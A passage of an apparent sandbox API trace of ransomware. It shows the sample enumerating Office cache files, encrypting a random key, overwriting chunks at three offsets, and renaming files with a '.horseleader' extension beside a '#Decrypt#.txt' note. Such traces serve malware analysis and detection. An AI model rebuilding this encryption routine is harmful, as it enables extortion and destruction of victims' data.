(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0191.175] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0191.176] CloseHandle (hObject=0x1cc) returned 1 [0191.176] GetProcessHeap () returned 0x780000 [0191.176] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0191.176] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0191.177] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0191.177] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned 66 [0191.177] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0191.177] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0191.177] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0191.177] GetProcessHeap () returned 0x780000 [0191.177] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0191.177] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*") returned 68 [0191.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0191.196] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0191.196] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.") returned 68 [0191.196] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0191.197] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0191.197] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0191.197] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0191.197] lstrlenW (lpString=".testttjffg") returned 11 [0191.197] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0191.197] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.198] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0191.198] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.402] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0191.403] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0191.405] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\..") returned 69 [0191.405] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0191.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0191.405] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0191.405] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0191.405] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0191.405] lstrlenW (lpString=".testttjffg") returned 11 [0191.405] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0191.405] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.405] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0191.406] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.410] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0191.410] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Windows") returned -1 [0191.410] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0191.411] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".horseleader") returned 0x0 [0191.411] lstrcmpW (lpString1="Office32MUI.msi", lpString2="#Decrypt#.txt") returned 1 [0191.411] lstrcmpW (lpString1="Office32MUI.msi", lpString2="_uninstalling_.png") returned 1 [0191.411] lstrlenW (lpString=".testttjffg") returned 11 [0191.411] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", lpSrch=".testttjffg") returned 0x0 [0191.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0191.414] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0191.415] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0191.415] StrStrW (lpFirst="Office32MUI.msi", lpSrch=".txt") returned 0x0 [0191.415] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=873984) returned 1 [0191.415] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.416] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.419] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.419] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.419] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x68300, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.419] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.423] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.423] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.423] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd0600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.423] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.426] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.426] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0191.427] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0191.427] CloseHandle (hObject=0x21c) returned 1 [0191.443] GetProcessHeap () returned 0x780000 [0191.443] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0191.443] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.horseleader") returned 94 [0191.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.horseleader")) returned 1 [0191.444] GetProcessHeap () returned 0x780000 [0191.445] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0191.445] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0191.445] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Windows") returned -1 [0191.445] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0191.445] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".horseleader") returned 0x0 [0191.445] lstrcmpW (lpString1="Office32MUI.xml", lpString2="#Decrypt#.txt") returned 1 [0191.445] lstrcmpW (lpString1="Office32MUI.xml", lpString2="_uninstalling_.png") returned 1 [0191.445] lstrlenW (lpString=".testttjffg") returned 11 [0191.445] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".testttjffg") returned 0x0 [0191.445] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.445] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0191.446] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0191.446] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0191.446] StrStrW (lpFirst="Office32MUI.xml", lpSrch=".txt") returned 0x0 [0191.446] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1383) returned 1 [0191.446] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x567, lpOverlapped=0x0) returned 1 [0191.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa99, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.449] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x567, lpOverlapped=0x0) returned 1 [0191.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.450] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0191.450] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0191.450] CloseHandle (hObject=0x21c) returned 1 [0191.491] GetProcessHeap () returned 0x780000 [0191.491] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0191.491] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.horseleader") returned 94 [0191.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.horseleader")) returned 1 [0191.492] GetProcessHeap () returned 0x780000 [0191.492] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0191.492] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0191.492] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="Windows") returned -1 [0191.492] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0191.493] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".horseleader") returned 0x0 [0191.493] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="#Decrypt#.txt") returned 1 [0191.493] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="_uninstalling_.png") returned 1 [0191.493] lstrlenW (lpString=".testttjffg") returned 11 [0191.493] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".testttjffg") returned 0x0 [0191.493] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.493] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0191.493] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0191.494] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0191.494] StrStrW (lpFirst="OWOW32LR.cab", lpSrch=".txt") returned 0x0 [0191.494] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2928955) returned 1 [0191.494] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.494] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.498] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.499] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.499] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x16309d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.499] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.502] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.502] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.503] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2c613b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.503] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.506] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.506] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.506] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.506] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0191.507] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0191.507] CloseHandle (hObject=0x21c) returned 1 [0194.287] GetProcessHeap () returned 0x780000 [0194.287] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0194.287] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 